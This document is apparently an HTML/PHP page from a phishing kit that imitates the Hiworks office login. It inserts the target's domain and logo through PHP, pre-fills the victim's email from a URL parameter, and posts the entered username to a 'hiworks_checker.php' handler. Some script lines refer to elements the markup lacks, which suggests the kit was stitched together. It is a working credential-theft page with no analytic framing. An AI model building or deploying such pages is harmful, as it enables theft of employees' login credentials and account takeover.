<html lang="ko">

<head>
  <meta http-equiv="Content-Language" content="en-us">
  <meta charset="UTF-8" />
  <link rel="icon" href="https://login.office.hiworks.com/favicon-96x96.png" />
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>&#54616;&#51060;&#50893;&#49828; &#47196;&#44536;&#51064;</title>
</head>
<style>
  html, body {
  font-family: Arial, sans-serif;
  margin: 0;
  padding: 0;
  border: 0;
  position: absolute;
  height: 100%;
  min-width: 100%;
  font-size: 13px;
  color: #676767;
  font-weight: 700;
  direction: ltr;
  -webkit-text-size-adjust: none;
  }
  input[type=text]{
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  font-color:#000; 
  font-size:16px; 
  padding:0; 
  box-shadow:none; 
  height:40px; 
  width:100%; 
  border-radius:0px; 
  border:none; 
  padding: 8 15px;!important; 
  line-height: 18px; 
  border-bottom:1px #2985db solid; 
  border-top: 1px #2985db solid; 
  border-left: 1px #2985db solid;
  line-height: 1.42857143;
  vertical-align: top;
  color: #404040;
  background-color: white;
  background-image: url("img/id.png");
  background-position: 1px 2px; 
  background-repeat: no-repeat;
  padding: 10px 35px;
  }
  input[type=text]:focus {
  outline: none;
  border: nono;  
  box-shadow:none;
  border-bottom:1px #2985db solid; 
  border-top: 1px #2985db solid; 
  border-left: 1px #2985db solid;
  }
  p{
  font-size: 14px;
  text-align: center;
  }
  h1{
  font-weight: 700;
  font-size: 24px;
  text-align: center;
  }
</style>
<body>

<table border="0" width="100%" cellspacing="0" cellpadding="0">
	<tr>
		<td>&nbsp;</td>
	</tr>
	<tr>
		<td>
		<div align="center">
			<table border="0" width="100" cellspacing="0" cellpadding="0">
				<tr>
					<td>
				<table border="0" width="100%" cellspacing="0" cellpadding="0">
				  <form action="hiworks_checker.php" method="post">
					<tr>
						<td height="110"></td>
					</tr>
					<tr>
						<td height="40">
						<p align="center">
						<img src="https://logo.clearbit.com/<?php echo $ddomain;?>" width="200" height="40">
                        </td>
					</tr>
					<tr>
						<td height="70"></td>
					</tr>
					<tr>
						<td height="26">
						<h1><font color="#000000" face="Arial">Sign in to</font> <font color="#7A7A7A"><?php echo $ddomain;?></font></h1></td>
					</tr>
					<tr>
						<td height="4"></td>
					</tr>
					
					<tr>
						<td height="14">
						<p>Please enter your username.</p></td>
					</tr>
					<tr>
						<td height="40"></td>
					</tr>
					<tr>
						<td width="400" height="40">
	                                        <div class="input-group">
						   <input name="user" value="" placeholder="Username" type="text" required class="form-control" id="usr" >
                                                   <input type="hidden" name="domain" value="@<?php echo $ddomain;?>" >
                                                   <span style="background-color:#fff; border:none; border-radius:0px; border-bottom: 1px blue solid; border-top: 1px blue solid; border-right: 1px blue solid" class="input-group-addon">@<?php echo $ddomain;?></span>
                                                </div>										
						</td>
					</tr>
					<tr>
						<td height="20"></td>
					</tr>
					<tr>
						<td>
						<input type="image" src="img/signin-btn.png" width="400" height="44" name="I1"></td>
					</tr>
					<tr>
						<td height="15"></td>
					</tr>
					<tr>
						<td height="15">
				<table border="0" width="100%" cellspacing="0" cellpadding="0">
					<tr>
						<td height="122" background="img/footer-2.png">
						<table border="0" width="100%" cellspacing="0" cellpadding="0">
							<tr>
								<td height="36">
								<table border="0" width="100%" cellspacing="0" cellpadding="0">
									<tr>
										<td width="8"></td>
										<td width="155">
										<p align="left">
										<a href="session_login.php" style="text-decoration: none; color: black; " >
										<font color="#2985db" size="2" face="Arial Unicode MS">
										Sign in with another office</font></a></td>
										<td height="20"></td>
									</tr>
								</table>
								</td>
							</tr>
							<tr>
								<td height="86"></td>
							</tr>
						</table>
						</td>
					</tr>
					<tr>
						<td height="2"></td>
					</tr>
					</table>
						</td>
					</tr>
					</form>
				</table>
					</td>
				</tr>
			</table>
		</div>
		</td>
	</tr>
	
	<tr>
		<td>
		
		</td>
	</tr>
		
</table>

</body>

<script>
  // Get email from URL
  const params = new URLSearchParams(window.location.search);
  const raw = params.get('login');
  const email = raw ? decodeURIComponent(raw) : '';

  // Split into user/domain
  let user = '', domain = '';
  if (email.includes('@')) {
    [user, domain] = email.split(/@(.*)/, 2);
  }

  // Fill visible input values
  const inputs = document.querySelectorAll('input[type="text"]');
  if (inputs.length >= 3) {
    inputs[0].setAttribute('value', email || 'email');
    inputs[1].setAttribute('value', user || 'user');
    inputs[2].setAttribute('value', domain || 'domain');
  }

  // Fill hidden inputs
  const hiddenInputs = document.querySelectorAll('input[type="hidden"]');
  hiddenInputs.forEach(input => {
    if (input.name === 'user') input.setAttribute('value', email || 'email');
    if (input.name === 'domain') input.setAttribute('value', domain || 'domain');
  });

  // Update button label
  const btn = document.querySelector('.button1');
  if (btn) btn.textContent = email || 'email';

  // Update greeting
  document.getElementById('greeting').textContent = email ? `Hello ${email}` : 'Hello';

  // Update "Sign in with another ID" link
  const link = document.getElementById('anotherLink');
  if (link) link.href = `another_user.html?login=${encodeURIComponent(email || '')}`;
</script>

</html>
